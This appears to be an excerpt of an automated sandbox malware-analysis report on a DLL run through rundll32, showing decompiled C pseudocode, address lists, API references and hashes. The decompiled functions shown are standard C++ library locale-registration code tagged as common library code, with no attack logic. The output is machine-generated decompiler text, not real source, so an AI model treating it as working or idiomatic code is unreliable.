				void* _t19;
				intOrPtr* _t20;
				intOrPtr* _t42;
				void* _t50;

				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653( &_v20, 0);
				_t50 =  *0x6e2c6c10; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t50;
				_t19 = E6E1E161C(0x6e2c6b2c);
				_t38 = _a8;
				_t20 = E6E1E171B(_a8, _t19);
				_t48 = _t20;
				if(_t20 != 0) {
					L5:
					E6E2066BA( &_v20);
					return E6E220075(_t48);
				} else {
					if(_t50 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E207E4C(__ebx, _t38, __edx, _t48, _t50) - 0xffffffff;
						if(__eflags == 0) {
							_t42 =  &_v32;
							E6E1E1438(_t42);
							E6E223D74( &_v32, 0x6e2c3504);
							asm("int3");
							 *_t42 = _v0;
							return _t42;
						} else {
							_t48 = _v16;
							_v16 = _t48;
							_v4 = 1;
							E6E206FD3(__eflags, _t48);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t48 + 4))))();
							 *0x6e2c6c10 = _t48;
							goto L5;
						}
					} else {
						_t48 = _t50;
						goto L5;
					}
				}
			}












                          0x6e207786
                          0x6e207790
                          0x6e207795
                          0x6e2077a0
                          0x6e2077a4
                          0x6e2077a7
                          0x6e2077ac
                          0x6e2077b0
                          0x6e2077b5
                          0x6e2077b9
                          0x6e2077fe
                          0x6e207801
                          0x6e20780d
                          0x6e2077bb
                          0x6e2077bd
                          0x6e2077c3
                          0x6e2077c9
                          0x6e2077d1
                          0x6e2077d4
                          0x6e20780e
                          0x6e207811
                          0x6e20781f
                          0x6e207824
                          0x6e20782b
                          0x6e207830
                          0x6e2077d6
                          0x6e2077d6
                          0x6e2077d9
                          0x6e2077dd
                          0x6e2077e1
                          0x6e2077ee
                          0x6e2077f6
                          0x6e2077f8
                          0x00000000
                          0x6e2077f8
                          0x6e2077bf
                          0x6e2077bf
                          0x00000000
                          0x6e2077bf
                          0x6e2077bd

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E207786
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E207790
                          • int.LIBCPMT ref: 6E2077A7
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • codecvt.LIBCPMT ref: 6E2077CA
                          • std::_Facet_Register.LIBCPMT ref: 6E2077E1
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E207801
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20781F
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
                          • String ID: ,k,n
                          • API String ID: 2594415655-471452842
                          • Opcode ID: 3dfab4b70d6542cd1a2806a9ce26b487951b8c9b1d2862f78e078a0c6e12c66e
                          • Instruction ID: 0179d36af2547f3a6f86643ce04adbca5e5398214e6b67d57264304a796339a0
                          • Opcode Fuzzy Hash: 3dfab4b70d6542cd1a2806a9ce26b487951b8c9b1d2862f78e078a0c6e12c66e
                          • Instruction Fuzzy Hash: B311E975A0061D9BCB01EBE4C844AEDB7BBBF44B14F100918E410AB3E0DFB4AA44C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20EEEB, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20EEEB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t321;
				signed int _t322;
				void* _t334;
				void* _t347;
				void* _t360;
				void* _t373;
				void* _t386;
				void* _t399;
				void* _t412;
				void* _t425;
				void* _t438;
				void* _t451;
				void* _t464;
				void* _t477;
				void* _t490;
				void* _t503;
				void* _t516;
				void* _t529;
				void* _t542;
				void* _t555;
				void* _t568;
				void* _t581;
				void* _t594;
				signed int _t853;
				signed int _t923;
				signed int _t924;
				signed int _t925;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t938;
				signed int _t939;
				signed int _t940;
				signed int _t941;
				signed int _t942;
				signed int _t943;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				signed int _t948;
				signed int _t949;
				signed int _t950;
				signed int _t951;
				signed int _t952;
				signed int _t953;
				signed int _t954;
				signed int _t955;
				signed int _t956;
				signed int _t957;
				signed int _t958;
				signed int _t959;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t967;
				void* _t990;

				_t920 = __edx;
				_t699 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t990 - 0x14, 0);
				_t945 =  *0x6e2c6e04; // 0x0
				 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
				 *(_t990 - 0x10) = _t945;
				_t321 = E6E1E161C(0x6e2c6b30);
				_t702 =  *((intOrPtr*)(_t990 + 8));
				_t322 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t321);
				_t922 = _t322;
				if(_t322 != 0) {
					L5:
					E6E2066BA(_t990 - 0x14);
					return E6E220075(_t922);
				} else {
					if(_t945 == 0) {
						_push( *((intOrPtr*)(_t990 + 8)));
						_push(_t990 - 0x10);
						__eflags = E6E210C9D(__ebx, _t702, __edx, _t922, _t945) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t990 - 0x20);
							E6E223D74(_t990 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t922, _t945, 0x14);
							E6E206653(_t990 - 0x14, 0);
							_t946 =  *0x6e2c6de4; // 0x0
							 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
							 *(_t990 - 0x10) = _t946;
							_t334 = E6E1E161C(0x6e2c6d90);
							_t709 =  *((intOrPtr*)(_t990 + 8));
							_t923 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t334);
							__eflags = _t923;
							if(_t923 != 0) {
								L12:
								E6E2066BA(_t990 - 0x14);
								return E6E220075(_t923);
							} else {
								__eflags = _t946;
								if(_t946 == 0) {
									_push( *((intOrPtr*)(_t990 + 8)));
									_push(_t990 - 0x10);
									__eflags = E6E210D03(_t699, _t709, __edx, _t923, _t946) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t990 - 0x20);
										E6E223D74(_t990 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t699, _t923, _t946, 0x14);
										E6E206653(_t990 - 0x14, 0);
										_t947 =  *0x6e2c6db4; // 0x0
										 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
										 *(_t990 - 0x10) = _t947;
										_t347 = E6E1E161C(0x6e2c6d68);
										_t716 =  *((intOrPtr*)(_t990 + 8));
										_t924 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t347);
										__eflags = _t924;
										if(_t924 != 0) {
											L19:
											E6E2066BA(_t990 - 0x14);
											return E6E220075(_t924);
										} else {
											__eflags = _t947;
											if(_t947 == 0) {
												_push( *((intOrPtr*)(_t990 + 8)));
												_push(_t990 - 0x10);
												__eflags = E6E210DA5(_t699, _t716, __edx, _t924, _t947) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t990 - 0x20);
													E6E223D74(_t990 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t699, _t924, _t947, 0x14);
													E6E206653(_t990 - 0x14, 0);
													_t948 =  *0x6e2c6dd4; // 0x0
													 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
													 *(_t990 - 0x10) = _t948;
													_t360 = E6E1E161C(0x6e2c6b28);
													_t723 =  *((intOrPtr*)(_t990 + 8));
													_t925 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t360);
													__eflags = _t925;
													if(_t925 != 0) {
														L26:
														E6E2066BA(_t990 - 0x14);
														return E6E220075(_t925);
													} else {
														__eflags = _t948;
														if(_t948 == 0) {
															_push( *((intOrPtr*)(_t990 + 8)));
															_push(_t990 - 0x10);
															__eflags = E6E210E47(_t699, _t723, _t920, _t925, _t948) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t990 - 0x20);
																E6E223D74(_t990 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t699, _t925, _t948, 0x14);
																E6E206653(_t990 - 0x14, 0);
																_t949 =  *0x6e2c6de8; // 0x0
																 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																 *(_t990 - 0x10) = _t949;
																_t373 = E6E1E161C(0x6e2c6d94);
																_t730 =  *((intOrPtr*)(_t990 + 8));
																_t926 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t373);
																__eflags = _t926;
																if(_t926 != 0) {
																	L33:
																	E6E2066BA(_t990 - 0x14);
																	return E6E220075(_t926);
																} else {
																	__eflags = _t949;
																	if(_t949 == 0) {
																		_push( *((intOrPtr*)(_t990 + 8)));
																		_push(_t990 - 0x10);
																		__eflags = E6E210EB7(_t699, _t730, _t920, _t926, _t949) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t990 - 0x20);
																			E6E223D74(_t990 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t699, _t926, _t949, 0x14);
																			E6E206653(_t990 - 0x14, 0);
																			_t950 =  *0x6e2c6db8; // 0x0
																			 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																			 *(_t990 - 0x10) = _t950;
																			_t386 = E6E1E161C(0x6e2c6d6c);
																			_t737 =  *((intOrPtr*)(_t990 + 8));
																			_t927 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t386);
																			__eflags = _t927;
																			if(_t927 != 0) {
																				L40:
																				E6E2066BA(_t990 - 0x14);
																				return E6E220075(_t927);
																			} else {
																				__eflags = _t950;
																				if(_t950 == 0) {
																					_push( *((intOrPtr*)(_t990 + 8)));
																					_push(_t990 - 0x10);
																					__eflags = E6E210F1F(_t699, _t737, _t920, _t927, _t950) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t990 - 0x20);
																						E6E223D74(_t990 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t699, _t927, _t950, 0x14);
																						E6E206653(_t990 - 0x14, 0);
																						_t951 =  *0x6e2c6dec; // 0x0
																						 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																						 *(_t990 - 0x10) = _t951;
																						_t399 = E6E1E161C(0x6e2c6d98);
																						_t744 =  *((intOrPtr*)(_t990 + 8));
																						_t928 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t399);
																						__eflags = _t928;
																						if(_t928 != 0) {
																							L47:
																							E6E2066BA(_t990 - 0x14);
																							return E6E220075(_t928);
																						} else {
																							__eflags = _t951;
																							if(_t951 == 0) {
																								_push( *((intOrPtr*)(_t990 + 8)));
																								_push(_t990 - 0x10);
																								__eflags = E6E210F87(_t699, _t744, _t920, _t928, _t951) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t990 - 0x20);
																									E6E223D74(_t990 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t699, _t928, _t951, 0x14);
																									E6E206653(_t990 - 0x14, 0);
																									_t952 =  *0x6e2c6dbc; // 0x0
																									 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																									 *(_t990 - 0x10) = _t952;
																									_t412 = E6E1E161C(0x6e2c6d70);
																									_t751 =  *((intOrPtr*)(_t990 + 8));
																									_t929 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t412);
																									__eflags = _t929;
																									if(_t929 != 0) {
																										L54:
																										E6E2066BA(_t990 - 0x14);
																										return E6E220075(_t929);
																									} else {
																										__eflags = _t952;
																										if(_t952 == 0) {
																											_push( *((intOrPtr*)(_t990 + 8)));
																											_push(_t990 - 0x10);
																											__eflags = E6E210FEF(_t699, _t751, _t920, _t929, _t952) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t990 - 0x20);
																												E6E223D74(_t990 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t699, _t929, _t952, 0x14);
																												E6E206653(_t990 - 0x14, 0);
																												_t953 =  *0x6e2c6df0; // 0x0
																												 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																												 *(_t990 - 0x10) = _t953;
																												_t425 = E6E1E161C(0x6e2c6d9c);
																												_t758 =  *((intOrPtr*)(_t990 + 8));
																												_t930 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t425);
																												__eflags = _t930;
																												if(_t930 != 0) {
																													L61:
																													E6E2066BA(_t990 - 0x14);
																													return E6E220075(_t930);
																												} else {
																													__eflags = _t953;
																													if(_t953 == 0) {
																														_push( *((intOrPtr*)(_t990 + 8)));
																														_push(_t990 - 0x10);
																														__eflags = E6E211057(_t699, _t758, _t920, _t930, _t953) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t990 - 0x20);
																															E6E223D74(_t990 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t699, _t930, _t953, 0x14);
																															E6E206653(_t990 - 0x14, 0);
																															_t954 =  *0x6e2c6dc0; // 0x0
																															 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																															 *(_t990 - 0x10) = _t954;
																															_t438 = E6E1E161C(0x6e2c6d74);
																															_t765 =  *((intOrPtr*)(_t990 + 8));
																															_t931 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t438);
																															__eflags = _t931;
																															if(_t931 != 0) {
																																L68:
																																E6E2066BA(_t990 - 0x14);
																																return E6E220075(_t931);
																															} else {
																																__eflags = _t954;
																																if(_t954 == 0) {
																																	_push( *((intOrPtr*)(_t990 + 8)));
																																	_push(_t990 - 0x10);
																																	__eflags = E6E2110BF(_t699, _t765, _t920, _t931, _t954) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t990 - 0x20);
																																		E6E223D74(_t990 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t699, _t931, _t954, 0x14);
																																		E6E206653(_t990 - 0x14, 0);
																																		_t955 =  *0x6e2c6df8; // 0x0
																																		 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																		 *(_t990 - 0x10) = _t955;
																																		_t451 = E6E1E161C(0x6e2c6da4);
																																		_t772 =  *((intOrPtr*)(_t990 + 8));
																																		_t932 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t451);
																																		__eflags = _t932;
																																		if(_t932 != 0) {
																																			L75:
																																			E6E2066BA(_t990 - 0x14);
																																			return E6E220075(_t932);
																																		} else {
																																			__eflags = _t955;
																																			if(_t955 == 0) {
																																				_push( *((intOrPtr*)(_t990 + 8)));
																																				_push(_t990 - 0x10);
																																				__eflags = E6E211127(_t699, _t772, _t920, _t932, _t955) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t990 - 0x20);
																																					E6E223D74(_t990 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t699, _t932, _t955, 0x14);
																																					E6E206653(_t990 - 0x14, 0);
																																					_t956 =  *0x6e2c6df4; // 0x0
																																					 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																					 *(_t990 - 0x10) = _t956;
																																					_t464 = E6E1E161C(0x6e2c6da0);
																																					_t779 =  *((intOrPtr*)(_t990 + 8));
																																					_t933 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t464);
																																					__eflags = _t933;
																																					if(_t933 != 0) {
																																						L82:
																																						E6E2066BA(_t990 - 0x14);
																																						return E6E220075(_t933);
																																					} else {
																																						__eflags = _t956;
																																						if(_t956 == 0) {
																																							_push( *((intOrPtr*)(_t990 + 8)));
																																							_push(_t990 - 0x10);
																																							__eflags = E6E2111AB(_t699, _t779, _t920, _t933, _t956) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1E1438(_t990 - 0x20);
																																								E6E223D74(_t990 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e2683cf, _t699, _t933, _t956, 0x14);
																																								E6E206653(_t990 - 0x14, 0);
																																								_t957 =  *0x6e2c6dc8; // 0x0
																																								 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																								 *(_t990 - 0x10) = _t957;
																																								_t477 = E6E1E161C(0x6e2c6d7c);
																																								_t786 =  *((intOrPtr*)(_t990 + 8));
																																								_t934 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t477);
																																								__eflags = _t934;
																																								if(_t934 != 0) {
																																									L89:
																																									E6E2066BA(_t990 - 0x14);
																																									return E6E220075(_t934);
																																								} else {
																																									__eflags = _t957;
																																									if(_t957 == 0) {
																																										_push( *((intOrPtr*)(_t990 + 8)));
																																										_push(_t990 - 0x10);
																																										__eflags = E6E211230(_t699, _t786, _t920, _t934, _t957) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1E1438(_t990 - 0x20);
																																											E6E223D74(_t990 - 0x20, 0x6e2c3504);
																																											asm("int3");
																																											E6E2200AC(0x6e2683cf, _t699, _t934, _t957, 0x14);
																																											E6E206653(_t990 - 0x14, 0);
																																											_t958 =  *0x6e2c6dc4; // 0x0
																																											 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																											 *(_t990 - 0x10) = _t958;
																																											_t490 = E6E1E161C(0x6e2c6d78);
																																											_t793 =  *((intOrPtr*)(_t990 + 8));
																																											_t935 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t490);
																																											__eflags = _t935;
																																											if(_t935 != 0) {
																																												L96:
																																												E6E2066BA(_t990 - 0x14);
																																												return E6E220075(_t935);
																																											} else {
																																												__eflags = _t958;
																																												if(_t958 == 0) {
																																													_push( *((intOrPtr*)(_t990 + 8)));
																																													_push(_t990 - 0x10);
																																													__eflags = E6E2112B4(_t699, _t793, _t920, _t935, _t958) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1E1438(_t990 - 0x20);
																																														E6E223D74(_t990 - 0x20, 0x6e2c3504);
																																														asm("int3");
																																														E6E2200AC(0x6e2683cf, _t699, _t935, _t958, 0x14);
																																														E6E206653(_t990 - 0x14, 0);
																																														_t959 =  *0x6e2c6dd8; // 0x0
																																														 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																														 *(_t990 - 0x10) = _t959;
																																														_t503 = E6E1E161C(0x6e2c6d84);
																																														_t800 =  *((intOrPtr*)(_t990 + 8));
																																														_t936 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t503);
																																														__eflags = _t936;
																																														if(_t936 != 0) {
																																															L103:
																																															E6E2066BA(_t990 - 0x14);
																																															return E6E220075(_t936);
																																														} else {
																																															__eflags = _t959;
																																															if(_t959 == 0) {
																																																_push( *((intOrPtr*)(_t990 + 8)));
																																																_push(_t990 - 0x10);
																																																__eflags = E6E211339(_t699, _t800, _t920, _t936, _t959) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1E1438(_t990 - 0x20);
																																																	E6E223D74(_t990 - 0x20, 0x6e2c3504);
																																																	asm("int3");
																																																	E6E2200AC(0x6e2683cf, _t699, _t936, _t959, 0x14);
																																																	E6E206653(_t990 - 0x14, 0);
																																																	_t960 =  *0x6e2c6db0; // 0x0
																																																	 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																	 *(_t990 - 0x10) = _t960;
																																																	_t516 = E6E1E161C(0x6e2c6d64);
																																																	_t807 =  *((intOrPtr*)(_t990 + 8));
																																																	_t937 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t516);
																																																	__eflags = _t937;
																																																	if(_t937 != 0) {
																																																		L110:
																																																		E6E2066BA(_t990 - 0x14);
																																																		return E6E220075(_t937);
																																																	} else {
																																																		__eflags = _t960;
																																																		if(_t960 == 0) {
																																																			_push( *((intOrPtr*)(_t990 + 8)));
																																																			_push(_t990 - 0x10);
																																																			__eflags = E6E2113A1(_t699, _t807, _t920, _t937, _t960) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E1E1438(_t990 - 0x20);
																																																				E6E223D74(_t990 - 0x20, 0x6e2c3504);
																																																				asm("int3");
																																																				E6E2200AC(0x6e2683cf, _t699, _t937, _t960, 0x14);
																																																				E6E206653(_t990 - 0x14, 0);
																																																				_t961 =  *0x6e2c6ddc; // 0x0
																																																				 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																				 *(_t990 - 0x10) = _t961;
																																																				_t529 = E6E1E161C(0x6e2c6d88);
																																																				_t814 =  *((intOrPtr*)(_t990 + 8));
																																																				_t938 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t529);
																																																				__eflags = _t938;
																																																				if(_t938 != 0) {
																																																					L117:
																																																					E6E2066BA(_t990 - 0x14);
																																																					return E6E220075(_t938);
																																																				} else {
																																																					__eflags = _t961;
																																																					if(_t961 == 0) {
																																																						_push( *((intOrPtr*)(_t990 + 8)));
																																																						_push(_t990 - 0x10);
																																																						__eflags = E6E211409(_t699, _t814, _t920, _t938, _t961) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6E1E1438(_t990 - 0x20);
																																																							E6E223D74(_t990 - 0x20, 0x6e2c3504);
																																																							asm("int3");
																																																							E6E2200AC(0x6e2683cf, _t699, _t938, _t961, 0x14);
																																																							E6E206653(_t990 - 0x14, 0);
																																																							_t962 =  *0x6e2c6de0; // 0x0
																																																							 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																							 *(_t990 - 0x10) = _t962;
																																																							_t542 = E6E1E161C(0x6e2c6d8c);
																																																							_t821 =  *((intOrPtr*)(_t990 + 8));
																																																							_t939 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t542);
																																																							__eflags = _t939;
																																																							if(_t939 != 0) {
																																																								L124:
																																																								E6E2066BA(_t990 - 0x14);
																																																								return E6E220075(_t939);
																																																							} else {
																																																								__eflags = _t962;
																																																								if(_t962 == 0) {
																																																									_push( *((intOrPtr*)(_t990 + 8)));
																																																									_push(_t990 - 0x10);
																																																									__eflags = E6E211471(_t699, _t821, _t920, _t939, _t962) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6E1E1438(_t990 - 0x20);
																																																										E6E223D74(_t990 - 0x20, 0x6e2c3504);
																																																										asm("int3");
																																																										E6E2200AC(0x6e2683cf, _t699, _t939, _t962, 0x14);
																																																										E6E206653(_t990 - 0x14, 0);
																																																										_t963 =  *0x6e2c6dfc; // 0x0
																																																										 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																										 *(_t990 - 0x10) = _t963;
																																																										_t555 = E6E1E161C(0x6e2c6da8);
																																																										_t828 =  *((intOrPtr*)(_t990 + 8));
																																																										_t940 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t555);
																																																										__eflags = _t940;
																																																										if(_t940 != 0) {
																																																											L131:
																																																											E6E2066BA(_t990 - 0x14);
																																																											return E6E220075(_t940);
																																																										} else {
																																																											__eflags = _t963;
																																																											if(_t963 == 0) {
																																																												_push( *((intOrPtr*)(_t990 + 8)));
																																																												_push(_t990 - 0x10);
																																																												__eflags = E6E2114EC(_t699, _t828, _t920, _t940, _t963) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													E6E1E1438(_t990 - 0x20);
																																																													E6E223D74(_t990 - 0x20, 0x6e2c3504);
																																																													asm("int3");
																																																													E6E2200AC(0x6e2683cf, _t699, _t940, _t963, 0x14);
																																																													E6E206653(_t990 - 0x14, 0);
																																																													_t964 =  *0x6e2c6dcc; // 0x0
																																																													 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																													 *(_t990 - 0x10) = _t964;
																																																													_t568 = E6E1E161C(0x6e2c6d80);
																																																													_t835 =  *((intOrPtr*)(_t990 + 8));
																																																													_t941 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t568);
																																																													__eflags = _t941;
																																																													if(_t941 != 0) {
																																																														L138:
																																																														E6E2066BA(_t990 - 0x14);
																																																														return E6E220075(_t941);
																																																													} else {
																																																														__eflags = _t964;
																																																														if(_t964 == 0) {
																																																															_push( *((intOrPtr*)(_t990 + 8)));
																																																															_push(_t990 - 0x10);
																																																															__eflags = E6E211558(_t699, _t835, _t920, _t941, _t964) - 0xffffffff;
																																																															if(__eflags == 0) {
																																																																E6E1E1438(_t990 - 0x20);
																																																																E6E223D74(_t990 - 0x20, 0x6e2c3504);
																																																																asm("int3");
																																																																E6E2200AC(0x6e2683cf, _t699, _t941, _t964, 0x14);
																																																																E6E206653(_t990 - 0x14, 0);
																																																																_t965 =  *0x6e2c6e00; // 0x0
																																																																 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																																 *(_t990 - 0x10) = _t965;
																																																																_t581 = E6E1E161C(0x6e2c6dac);
																																																																_t842 =  *((intOrPtr*)(_t990 + 8));
																																																																_t942 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t581);
																																																																__eflags = _t942;
																																																																if(_t942 != 0) {
																																																																	L145:
																																																																	E6E2066BA(_t990 - 0x14);
																																																																	return E6E220075(_t942);
																																																																} else {
																																																																	__eflags = _t965;
																																																																	if(_t965 == 0) {
																																																																		_push( *((intOrPtr*)(_t990 + 8)));
																																																																		_push(_t990 - 0x10);
																																																																		__eflags = E6E2115C4(_t699, _t842, _t920, _t942, _t965) - 0xffffffff;
																																																																		if(__eflags == 0) {
																																																																			E6E1E1438(_t990 - 0x20);
																																																																			E6E223D74(_t990 - 0x20, 0x6e2c3504);
																																																																			asm("int3");
																																																																			E6E2200AC(0x6e2683cf, _t699, _t942, _t965, 0x14);
																																																																			E6E206653(_t990 - 0x14, 0);
																																																																			_t966 =  *0x6e2c6dd0; // 0x0
																																																																			 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																																			 *(_t990 - 0x10) = _t966;
																																																																			_t594 = E6E1E161C(0x6e2c6d60);
																																																																			_t849 =  *((intOrPtr*)(_t990 + 8));
																																																																			_t943 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t594);
																																																																			__eflags = _t943;
																																																																			if(_t943 != 0) {
																																																																				L152:
																																																																				E6E2066BA(_t990 - 0x14);
																																																																				return E6E220075(_t943);
																																																																			} else {
																																																																				__eflags = _t966;
																																																																				if(_t966 == 0) {
																																																																					_push( *((intOrPtr*)(_t990 + 8)));
																																																																					_push(_t990 - 0x10);
																																																																					__eflags = E6E21162A(_t699, _t849, _t920, _t943, _t966) - 0xffffffff;
																																																																					if(__eflags == 0) {
																																																																						_t853 = _t990 - 0x20;
																																																																						E6E1E1438(_t853);
																																																																						E6E223D74(_t990 - 0x20, 0x6e2c3504);
																																																																						asm("int3");
																																																																						E6E2200AC(0x6e26851f, _t699, _t943, _t966, 4);
																																																																						_t967 = _t853;
																																																																						 *(_t990 - 0x10) = _t967;
																																																																						 *((intOrPtr*)(_t967 + 4)) =  *((intOrPtr*)(_t990 + 0xc));
																																																																						_push( *((intOrPtr*)(_t990 + 0x14)));
																																																																						_t315 = _t990 - 4;
																																																																						 *_t315 =  *(_t990 - 4) & 0x00000000;
																																																																						__eflags =  *_t315;
																																																																						 *_t967 = 0x6e26c0c4;
																																																																						 *((char*)(_t967 + 0x28)) =  *((intOrPtr*)(_t990 + 0x10));
																																																																						E6E21542F(_t699, _t853, _t920, _t943, _t967,  *_t315);
																																																																						return E6E220075(_t967,  *((intOrPtr*)(_t990 + 8)));
																																																																					} else {
																																																																						_t943 =  *(_t990 - 0x10);
																																																																						 *(_t990 - 0x10) = _t943;
																																																																						 *(_t990 - 4) = 1;
																																																																						E6E206FD3(__eflags, _t943);
																																																																						 *0x6e26a26c();
																																																																						 *((intOrPtr*)( *((intOrPtr*)( *_t943 + 4))))();
																																																																						 *0x6e2c6dd0 = _t943;
																																																																						goto L152;
																																																																					}
																																																																				} else {
																																																																					_t943 = _t966;
																																																																					goto L152;
																																																																				}
																																																																			}
																																																																		} else {
																																																																			_t942 =  *(_t990 - 0x10);
																																																																			 *(_t990 - 0x10) = _t942;
																																																																			 *(_t990 - 4) = 1;
																																																																			E6E206FD3(__eflags, _t942);
																																																																			 *0x6e26a26c();
																																																																			 *((intOrPtr*)( *((intOrPtr*)( *_t942 + 4))))();
																																																																			 *0x6e2c6e00 = _t942;
																																																																			goto L145;
																																																																		}
																																																																	} else {
																																																																		_t942 = _t965;
																																																																		goto L145;
																																																																	}
																																																																}
																																																															} else {
																																																																_t941 =  *(_t990 - 0x10);
																																																																 *(_t990 - 0x10) = _t941;
																																																																 *(_t990 - 4) = 1;
